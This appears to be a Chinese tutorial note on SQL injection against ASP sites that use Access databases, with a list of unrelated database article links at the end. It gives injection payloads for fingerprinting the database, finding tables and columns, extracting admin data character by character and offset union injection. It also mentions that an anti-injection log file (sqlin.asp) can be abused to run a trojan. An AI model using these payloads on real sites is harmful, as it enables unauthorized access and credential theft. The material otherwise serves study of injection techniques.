Access数据库

  • access是没有数据库的;只有表

  • 流程

    • 判断数据库类型--->判断表名----> 判断列名---->判断列名长度(列中第一条记录数据长度)---->读取数据
  • asp网站常用数据库:access和mssql数据库

  • 判断数据库

    • 如果有msysobjects则是access数据库;如果有sysobjects则是sqlsever数据库
    • and exists (select * from msysobjects)>0 access
    • and exists (select * from sysobjects)>0 sqlserver
  • 查表

    • and exists (select * from 表名)
  • 查列名

    • and exists (select 列名 from 表名)
  • 判断列名长度

    • and (select top 1 len(列名) from 表名)>5 :列名是否大于5
  • 逐字符爆破

    • and (select top 1 asc(mid(user,1,1)) from admin)=97
    • asc() 返回字符的ascii码
    • top 1 :只返回最上面一条数据
  • 偏移注入(需要结合联合查询)

    • 联合查询补充字段数=当前表的字段数-查询表的字段数*N
    • union select 1,2,3,4,5,,,* from admin_user :*代表了admin_user的总字段数的倍数
  • 通用性防注入

    • 将输入的行为存放到sqlin.asp文件中;类似于日志
    • 该操作会导致文件木马程序的执行;相当于文件上传了
相关推荐
闻哥6 分钟前
小表驱动大表——SQL查询优化的核心原则(深度剖析+流程图)
数据库·sql·流程图
cmes_love22 分钟前
港股Level2历史数据:逐笔成交与分钟线
数据库·oracle
自由能燃气设备22 分钟前
燃气热水锅炉/全预混低氮冷凝锅炉哪个品牌好?哪家好?6大商用品牌横评
大数据·数据库·人工智能
智购科技智能售货柜25 分钟前
2026自动售货机设备能耗计量系统:从功率监测到能效分析的工程实践~YH
数据库·人工智能·redis·缓存·架构·perl·symfony
云贝贝贝27 分钟前
PostgreSQL 生产环境备份恢复与高可用实战
数据库·postgresql
程序员-Benothing1 小时前
MySQL 中的 MVCC 是什么?如果没有 MVCC,会有什么影响?
数据库·mysql
Zenova EdgeOS1 小时前
工业网关心跳机制:从 Keepalive 到健康判定的工程实战
大数据·网络·数据库·边缘计算·工业网关
疯狂打码的少年1 小时前
【数据库技术】关系完整性约束(实体/参照/用户定义)
运维·服务器·数据库·笔记
派小汤2 小时前
Harmony2.2.0通过RdbStore实现通用类操作本地SQLite数据库
数据库·sql·sqlite·鸿蒙·鸿蒙系统
程序员-Benothing3 小时前
MySQL 中的事务隔离级别有哪些?默认的事务隔离级别是什么?为什么选择这个级别?
数据库·mysql